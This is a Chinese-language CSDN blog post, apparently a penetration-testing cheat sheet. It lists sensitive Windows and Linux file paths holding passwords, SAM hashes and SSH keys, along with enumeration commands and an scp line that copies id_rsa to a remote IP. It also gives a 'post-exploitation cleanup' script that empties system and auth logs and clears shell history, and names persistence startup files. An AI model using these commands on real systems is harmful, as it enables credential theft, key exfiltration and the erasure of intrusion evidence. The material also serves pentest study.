网络安全之敏感文件与命令

最新推荐文章于 2024-05-30 10:13:55 发布
最新推荐文章于 2024-05-30 10:13:55 发布
阅读量550 收藏 6
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlk_a1540775228/article/details/131871688
版权

windows下的敏感文件路径

c:\windows\my.ini       \\安装mysql时会将root密码写入该文件
c:\windows\system32\config\sam  \\存放windows管理员登陆密码
C:\windows\repair\sam     //存储系统初次安装的密码
c:\windows\system32\inetsrv\MetaBase.xml  \\存放iis配置文件
c:\tomcat5.0\conf\resin.conf  tomcat存放密码的位置
C:\boot.ini          //查看系统版本
C:\windows\win.ini   //基本系统配置文件
C:\ProgramFiles\mysql\my.ini  //Mysq1配置
C:/ProgramFiles/mysql/data/mysql/user.MYD     //Mysqlroot
C:\windows\php.ini              //php配置信息

linux下的敏感文件路径

/usr/local/app/apache2/conf/httpd.conf 		//apache2缺省配置文件
/usr/local/app/php5/lib/php.ini   	//PHP相关设置
/etc/sysconfig/network-scripts/ifcfg-eth0 		 //查看IP
/etc/my.cnf   		          //mysql的配置文件
/etc/redhat-release 	//系统版本/etc/rc.local   有时可以读出来apache的路径
/etc/passwd   /etc/shadow     //用户信息密码存放文件
/etc/my.cnf                  //mysql配置文件    
/etc/httpd,/conf/httpd.conf     //apache配置文件    
    
/root/.ssh/authorized._keys //ssh登录认证文件
/root/.ssh/id_rsa.keystore.//密钥存放文件
/root/.ssh/known_hosts//已访问过的主机公钥记录文件
/root/.bash_history    //记录系统历史命令文件
/root/.mysql_history  //记录数据库历史命令文件
    
/proc/self/fd/fd[0-9]*(文件标识符)//连接当前正运行的进程
/proc/mounts            //已挂载的文件系统信息
/porc/config.gz          //内核配置文件

敏感命令


#System Version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
#User Env
cat /etc/profile
cat /etc/bashrc
set
#env
cat ~/.bash_logout
cat ~/.bashrc
cat ~/.bash_profile
#Networking
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
last
#SCP
scp id_rsa username@10.10.164.167:~/destination -P 1337
scp user@10.10.164.167:~/path_to_file file_saved -P 1337
#python
python3 -m http.server 1337
python -m SimpleHTTPServer 1337
#download
wget http://url
curl -o local_save_path http://url

# # # # # # # # # # # # # # # # # # 后渗透扫尾 # # # # # # # # # # # # # # # # # # 
汇总脚本  权限一般只有root能写
#!/usr/bin/bash
echo >/var/log/syslog
echo >/var/log/messages
echo >/var/log/httpd/access_log
echo >/var/log/httpd/error_loge
echo >/var/log/xferlog
echo >/var/log/secure
echo >/var/log/auth.log
echo >/var/log/user.log
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/btmp
echo >/var/run/utmp
history -c
    
/etc/rc.local  ####################开机启动项      Redhat
->/etc/rc.d/rc.local
~/.bashrc      ####################终端启动项      Redhat
/etc/bashrc    ####################终端启动项      Redhat
/etc/bash.bashrc###################终端启动项      DeBain

WebServer默认文件路径

Web敏感文件.jpg

在这里插入图片描述

xlk_a1540775228
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows linux 敏感目录 路径汇总
weixin_50464560的博客
07-24 2882
0x01、 基本信息 遇到文件包含、任意文件下载等漏洞的时候,可以结合这篇文章,进行下一步攻击。 0x02、配置文件 查找文件 如果能够命令执行,直接使用查找命令吧。。。 Linux 相关: # 查找文件 find / -name filename.ext # 全盘查找含有 flag 的文件 grep flag -r / Windows 相关: # 全盘查找文件,一定要加一个星号! for /r c:\ %i in (password.txt*) do @echo %i for /r c:\ %i in
load_file() 常用敏感信息.txt
07-18
load_file() 常用敏感信息
网络安全工程师必知:系统敏感目录一览
网络安全
04-09 1084
网络安全应急响应过程中,对系统进行整体的安全排查至关重要。恶意文件往往隐藏在系统的一些敏感目录中,因此,了解这些目录对于提高恶意文件排查的效率至关重要。这些目录中包含了系统配置、日志、临时文件以及用户数据等关键信息,可能被攻击者利用来隐藏或执行恶意文件。因此,在安全排查中,安全团队需要仔细检查这些目录,查找任何异常或可疑文件,并进行进一步的分析和处理。利用安全工具进行自动化扫描是一种有效的方式,但也需要结合人工审查来发现隐藏的恶意文件。定期审查敏感目录并建立巡检机制有助于及早发现和应对潜在的安全威胁。
敏感文件整理
weixin_30865427的博客
07-25 316
Windows c:/boot.ini #查看系统版本 c:/windows/php.ini #php配置信息 c:/windows/my.ini #MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt/my.ini c:\mysql\data\mysql\user.MYD #mysql.user表中的...
windows和linux敏感文件记录
真正的大师,永远都怀着一颗学徒的心。
08-30 2747
文章目录前言一、windows二、linux 前言 敏感文件的重要性对于渗透测试来说不言而喻,文件包含,任意文件读取,以及任何需要探测主机文件的地方,都少不了这些目录的存在。所以还是要尽可能的多记一些,想不起来了就去百度一波。 一、windows C:\boot.ini //查看系统版本 C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件 C:\Windows\repair\sam //存储系统初次安装的密码 C:\Program Files\mysql.
渗透测试中Windows、Linux敏感文件
weixin_46239998的博客
04-30 2327
渗透测试中常用的敏感文件
Windows中使用findstr查找敏感文件账号密码
good good study
03-15 558
在内网渗透时,翻找主机文件是否存在账号密码是很重要的一个步骤,而这一过程很耗时,目前也没什么好用的工具,所以借助于cmd自带的findstr进行查找,如下为自己研究整理的查找命令。./* 表示当前目录下的所有文件,不包括子目录。/S 在当前目录和所有子目录中搜索匹配文件。findstr用于在文件中搜索字符。/P 忽略有不可打印字符的文件
网络安全专业术语简介.docx
06-09
并且根据网络管理人员提出的需求,将网络安全代理分布地布置在整个网络系统之中,然后将选取出的网络功能模块和网络响应命令添加到网络安全代理上,网络安全管理中心可以自动管理网络安全代理对各种网络安全事件进行...
网络安全实验.doc
06-09
网络安全实验 石河子大学信息科学与技术学院 网络安全课程实验 "实验名称: "使用任选工具进行网络检测与扫描 " "学生姓名: "刘金红 " " "学 号: "05 " " "学 院: "信息科学与技术学院 " "专业年级: "计算机科学...
网络安全审计.pdf
06-09
网络安全审计 国际互联网络安全审计(网络备案),是为了加强和规范互联网 安全技术防范工作,保障互联网网络安全和信息安全,促进互联网健 康、有序发展,维护国家安全、社会秩序和公共利益。 网络安全审计概念 ...
网络安全知识点复习.docx
06-09
脚本小子 内部的威胁 网络误用/滥用 没有良好的管理机制 端口镜像及其应用、交换机上配置的命令 把交换机一个或多个端口(VLAN)的数据镜像到一个或多个端口的方法 网络安全知识点复习全文共20页,当前为第2页。...
-关于网络安全的总结.doc
06-07
关于网络安全的总结 网络安全的重点是对网络系统的设备、程序及其中的信息进行保护,防止信息其被恶意 或者偶然地损害、篡改、泄露等,今天给大家整理了关于网络安全的总结,谢谢大家对 小编的支持。 关于网络安全的...
利用系统命令搜集敏感文件
LuckySec
04-14 1190
前言 通过渗透拿到一台内网机器的低权限用户后,无法进行进一步利用时,可以使用系统命令来搜集查找一些当前机器可能存在的敏感文件信息。 0x01 Windows 环境 根据文件名称搜索 利用dir命令查找当前目录下文件名称中包含(user.,pass.,username.,password.,config.)关键字的文件。 dir /b /s user.*,pass.*,username.*,password.*,config.* 利用for循环命令查找指定目录(C:\phpStudy\PHPTutori
load_file()常用路径
收集盒 Book box
03-27 1293
WINDOWS下: c:/boot.ini          //查看系统版本 c:/windows/php.ini   //php配置信息 c:/windows/my.ini    //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt/my.ini c:\mysql\data\mysql\user.MYD  //存储了m
系统敏感路径
山兔的博客
08-14 1681
【代码】系统敏感路径。
apache config httpd.conf file防止目录列表被浏览、敏感目录或文件限制IP访问
gongpeng1966的专栏
04-28 2725
Options FollowSymLinks Includes ExecCGI     #     # AllowOverride controls what directives may be placed in .htaccess files.     # It can be "All", "None", or any combination of the keywords:   
常见敏感文件
weixin_30325793的博客
04-24 1767
Unix/liux系统 /etc/passwd    /usr/local/app/apache2/conf/httpd.conf...
网络安全岗秋招面试题及面试经验分享
最新发布
HUANGXIN9898的博客
05-30 706
这就是一个典型的事务,这个事务是不可分割的最小工作单元,整个事务中的所有操作要么全部提交成功,要么全部失败回滚,不可能只执行其中一部分,这也是事务的原子性特征。写锁是排他的,即一个写锁会阻塞其它的写锁和读锁,只有这样,才能确保给定时间内,只有一个用户能执行写入,防止其它用户读取正在写入的同一资源。学校攻防演练时担任的角色,主要工作内容,渗透测试的思路,有什么成果(这个问的还是挺细的,具体到分配的任务、有没有拿下主机或者域控、攻防演练的形式和持续时间等都聊了)索引是帮助MySQL高效获取数据的数据结构。
web安全渗透测试工具篇(二):sqlmap常用命令和nmap常用命令
HACKONE的博客
05-26 178
这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
网络安全C2是什么意思
02-07
网络安全中的C2(Command and Control)是指恶意软件或攻击者用来控制被感染的计算机或网络的一种机制或系统。C2系统允许攻击者远程控制受感染的计算机,执行各种恶意活动,例如窃取敏感信息、发起攻击、传播恶意软件等。 C2系统通常由两个主要组件组成:C2服务器和C2客户端。C2服务器是攻击者控制的中央服务器,用于接收来自受感染计算机的指令,并向其发送命令。C2客户端则是恶意软件或病毒在受感染计算机上运行的组件,负责与C2服务器进行通信,接收指令并执行相应的操作。 攻击者可以利用C2系统进行各种恶意活动,如远程执行命令文件传输、键盘记录、屏幕截图、网络扫描等。C2系统通常采用加密和隐藏技术,以避免被检测和阻止。 为了保护计算机和网络安全,防止C2攻击,网络安全专家和组织采取了多种防御措施,如入侵检测系统(IDS)、入侵防御系统(IPS)、防火墙、反病毒软件等,以及定期更新和加强安全策略和措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值